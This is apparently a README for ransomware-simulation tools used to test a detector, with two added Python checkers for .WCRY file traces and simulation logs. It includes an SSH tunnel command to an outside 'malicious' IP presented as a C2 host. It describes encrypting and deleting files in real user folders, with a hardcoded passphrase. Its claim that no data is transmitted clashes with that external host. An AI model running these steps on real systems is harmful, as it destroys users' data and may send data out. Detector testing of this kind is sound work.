
Ransomware Simulation Tools

Overview

This directory contains tools for simulating ransomware behavior to test the ransomware detector system.

⚠️ WARNING: These scripts are for TESTING PURPOSES ONLY! No real data is transmitted.

⚠️ WARNING: Using these tools may corrupt your system or user files if misconfigured, and create_test_directory.bat writes its test files into your real user folders (Documents, Pictures, Music, etc.). Run them in a disposable VM or take a snapshot first. Using these tools is at your own risk.

Quick Start

Step 1: Start C2 Server (the bundled c2_server.py, which receives the simulated exfiltration data)

cd tools\simulation
python c2_server.py

Step 2: Run Ransomware Simulation (in another terminal)

simulate_ransomware.bat --encrypt

Decrypt Files

simulate_ransomware.bat --decrypt

Interactive Menu

simulate_ransomware.bat

Main Features

Option 1: Encrypt Directory

  • Phase 1: Simulates data exfiltration to C2 server (185.243.115.47:4444)
  • Phase 2: Encrypts all test files with AES-256-CBC encryption
  • Adds .WCRY extension to encrypted files

Option 2: Decrypt Directory

  • Restores all encrypted files to their original state
  • Removes .WCRY extensions

Option 3: Simulate Data Exfiltration Only

  • Runs network exfiltration simulation without encrypting files
  • Simulates SSH tunnel, DNS lookup, and C2 communication

What Gets Simulated

Network Activity (Phase 1 - ~10 seconds)

  • DNS lookup to suspicious IP (185.243.115.47)
  • SSH tunnel creation: ssh -D 9050 -N -f malicious@185.243.115.47
  • SOCKS5 proxy on port 9050
  • Base64 encoding of victim data
  • Chunked data transmission (1856 bytes in 4 chunks)
  • C2 server acknowledgment with Bitcoin payment address
  • Ransom note template download

File System Activity (Phase 2 - 10-60 seconds)

  • Recursive file scanning
  • AES-256-CBC encryption of target files
  • Extension changes to .WCRY
  • Original file deletion
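A stand-alone check for the file-system traces Phase 2 should leave behind, added here as an example; it is not one of this repository's scripts and not the RansomwareDetector's own logic. It walks a directory, counts files that carry the .WCRY extension on top of one of the targeted extensions (report.docx.WCRY), and estimates from byte entropy whether their contents look encrypted rather than merely renamed. The entropy threshold, the alert rule and the sample tree are assumptions made for this example; the sample "encrypted" files are random bytes standing in for AES-CBC output.

```python
import math
import os
import tempfile
from collections import Counter
from pathlib import Path

# Subset of the extensions this README lists as targets, plus the extension
# the simulator appends. A double extension such as "report.docx.WCRY" is the
# indicator we look for.
TARGET_EXTS = {".doc", ".docx", ".xls", ".xlsx", ".ppt", ".pptx", ".pdf", ".txt",
               ".jpg", ".png", ".mp3", ".mp4", ".zip", ".rar", ".sql", ".db"}
RANSOM_EXT = ".WCRY"

# Assumed threshold for this example: English text sits around 4-5 bits/byte,
# AES-CBC output (like random bytes) close to 8 bits/byte.
ENTROPY_THRESHOLD = 7.0


def shannon_entropy(data: bytes) -> float:
    """Bits of entropy per byte; 0.0 for an empty buffer."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def scan_directory(root, sample_size=4096):
    """Count WCRY-style indicators under root (first sample_size bytes per file)."""
    result = {
        "ransom_ext_files": 0,            # any file ending in .WCRY
        "double_ext_files": 0,            # .WCRY appended to a targeted extension
        "high_entropy_files": 0,          # .WCRY files whose bytes look encrypted
        "plaintext_targets_remaining": 0, # targeted files not (yet) renamed
    }
    for path in Path(root).rglob("*"):
        if not path.is_file():
            continue
        suffixes = path.suffixes
        if suffixes and suffixes[-1].upper() == RANSOM_EXT:
            result["ransom_ext_files"] += 1
            if len(suffixes) >= 2 and suffixes[-2].lower() in TARGET_EXTS:
                result["double_ext_files"] += 1
            with path.open("rb") as fh:
                if shannon_entropy(fh.read(sample_size)) >= ENTROPY_THRESHOLD:
                    result["high_entropy_files"] += 1
        elif path.suffix.lower() in TARGET_EXTS:
            result["plaintext_targets_remaining"] += 1
    return result


def encryption_detected(indicators, min_files=3):
    """Assumed alert rule: several targets renamed to .WCRY AND looking encrypted."""
    return (indicators["double_ext_files"] >= min_files
            and indicators["high_entropy_files"] >= min_files)


def build_sample_tree(root):
    """Constructed sample: three 'encrypted' files plus one untouched document."""
    docs = Path(root) / "Documents"
    docs.mkdir(parents=True, exist_ok=True)
    for name in ("report.docx", "budget.xlsx", "notes.txt"):
        # Random bytes stand in for AES-CBC ciphertext (near 8 bits/byte).
        (docs / f"{name}{RANSOM_EXT}").write_bytes(os.urandom(2048))
    (docs / "todo.txt").write_text("buy milk\ncall dentist\n" * 50)
    return root


def run_demo():
    """Build the sample tree in a temp dir, scan it, return the indicators."""
    with tempfile.TemporaryDirectory() as tmp:
        return scan_directory(build_sample_tree(tmp))


if __name__ == "__main__":
    found = run_demo()
    print(found, "ALERT" if encryption_detected(found) else "clean")
```

Point it at the folder create_test_directory.bat populated to confirm the simulation actually produced what the detector is supposed to catch: after --encrypt the double-extension and high-entropy counts should match the number of test files, and after --decrypt both should be back to zero.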

Configuration

Edit the configuration section in simulate_ransomware.bat:

C2_IP=185.243.115.47      # Suspicious IP (known malicious range)
C2_PORT=4444              # Common C2 port
TUNNEL_PORT=9050          # SOCKS5/TOR port
PRIVATE_KEY=MySecretPassword123!PleaseChange

Despite its name, PRIVATE_KEY is the symmetric passphrase for the AES-256-CBC step and is used for both --encrypt and --decrypt. Do not change it between an encryption run and the matching decryption run, or the test files cannot be restored.

Files

  • create_test_directory.bat - Creates test files in actual user folders (Documents, Pictures, Music, etc.)
  • simulate_ransomware.bat - Main simulation script

These are auxiliary files used by the main scripts:

  • create_files_parallel.ps1 - PowerShell file generator
  • c2_server.py - Python C2 server to receive exfiltrated data
  • exfiltrate.ps1 - PowerShell script for network exfiltration
  • verify_setup.bat - Verification script (checks all components)
  • test_exfiltration.bat - Quick test script

Testing Procedure

  1. Start RansomwareDetector

    python run.py
  2. Run Simulation

    cd tools\simulation
    simulate_ransomware.bat --encrypt
  3. Check Alerts - Verify both network and file system detections

  4. Clean Up

    simulate_ransomware.bat --decrypt

File Types Targeted

Documents, Images, Audio/Video, Archives, Databases, Source Code: .doc, .docx, .xls, .xlsx, .ppt, .pptx, .pdf, .txt, .jpg, .png, .mp3, .mp4, .zip, .rar, .sql, .db, and more.

Log File

Check exfiltration_simulation.log for activity logs:

[12/14/2025 14:30:15] SSH tunnel established to 185.243.115.47:4444
[12/14/2025 14:30:18] Transmitted 1856 bytes to 185.243.115.47:4444
[12/14/2025 14:30:20] C2 server confirmed key reception
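An added example, not part of this repository, that parses log lines in the format shown above and confirms the network phase completed against the configured C2 endpoint. It is useful in step 3 of the testing procedure to separate "the simulation never ran" from "the detector missed it". SAMPLE_LOG is constructed from the three lines shown above; the 1856-byte expectation and the 185.243.115.47:4444 endpoint come from this README; the field and function names are this example's own.

```python
import re
from dataclasses import dataclass
from datetime import datetime
from typing import List, Optional

# Line shape shown in this README: "[MM/DD/YYYY HH:MM:SS] message"
LINE_RE = re.compile(r"^\[(?P<ts>\d{2}/\d{2}/\d{4} \d{2}:\d{2}:\d{2})\] (?P<msg>.*)$")
ENDPOINT_RE = re.compile(r"(?P<ip>\d{1,3}(?:\.\d{1,3}){3}):(?P<port>\d{1,5})")
BYTES_RE = re.compile(r"Transmitted (?P<n>\d+) bytes")

# Constructed sample, copied from the lines shown in this README.
SAMPLE_LOG = """\
[12/14/2025 14:30:15] SSH tunnel established to 185.243.115.47:4444
[12/14/2025 14:30:18] Transmitted 1856 bytes to 185.243.115.47:4444
[12/14/2025 14:30:20] C2 server confirmed key reception
"""


@dataclass
class Event:
    ts: datetime
    msg: str
    ip: Optional[str]   # destination IP if the message names one
    port: Optional[int]
    nbytes: int         # bytes claimed transmitted, 0 for other messages


def parse_line(line: str) -> Optional[Event]:
    """Return an Event for a well-formed line, None for anything else."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    msg = m.group("msg")
    ep = ENDPOINT_RE.search(msg)
    nb = BYTES_RE.search(msg)
    return Event(
        ts=datetime.strptime(m.group("ts"), "%m/%d/%Y %H:%M:%S"),
        msg=msg,
        ip=ep.group("ip") if ep else None,
        port=int(ep.group("port")) if ep else None,
        nbytes=int(nb.group("n")) if nb else 0,
    )


def parse_log(text: str) -> List[Event]:
    return [e for e in (parse_line(l) for l in text.splitlines()) if e]


def summarize(events: List[Event], c2_ip: str, c2_port: int) -> dict:
    """Roll up what the simulation claims to have done against one C2 endpoint."""
    to_c2 = [e for e in events if e.ip == c2_ip and e.port == c2_port]
    span = (max(e.ts for e in events) - min(e.ts for e in events)).total_seconds() if events else 0.0
    return {
        "c2_events": len(to_c2),
        "bytes_to_c2": sum(e.nbytes for e in to_c2),  # sums across chunk lines
        "tunnel_established": any("SSH tunnel established" in e.msg for e in to_c2),
        "key_confirmed": any("confirmed key reception" in e.msg for e in events),
        "duration_s": span,
    }


def network_phase_ok(summary: dict, expected_bytes: int = 1856) -> bool:
    """True when tunnel, transfer and key confirmation are all present."""
    return (summary["tunnel_established"]
            and summary["key_confirmed"]
            and summary["bytes_to_c2"] == expected_bytes)


if __name__ == "__main__":
    s = summarize(parse_log(SAMPLE_LOG), "185.243.115.47", 4444)
    print(s, "network phase complete" if network_phase_ok(s) else "incomplete")
```

Feed it the real exfiltration_simulation.log with the C2_IP and C2_PORT values from simulate_ransomware.bat; if network_phase_ok is False, fix the simulation setup (verify_setup.bat) before reading a missing network alert as a detector gap.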

Future Improvements

  • For now, simulated network activity is for concept representation only. Future versions may include more realistic network traffic patterns.

Legal Disclaimer

These tools are for legitimate security testing only. Unauthorized use is illegal and unethical.


All network activities are SIMULATED - No real data is transmitted!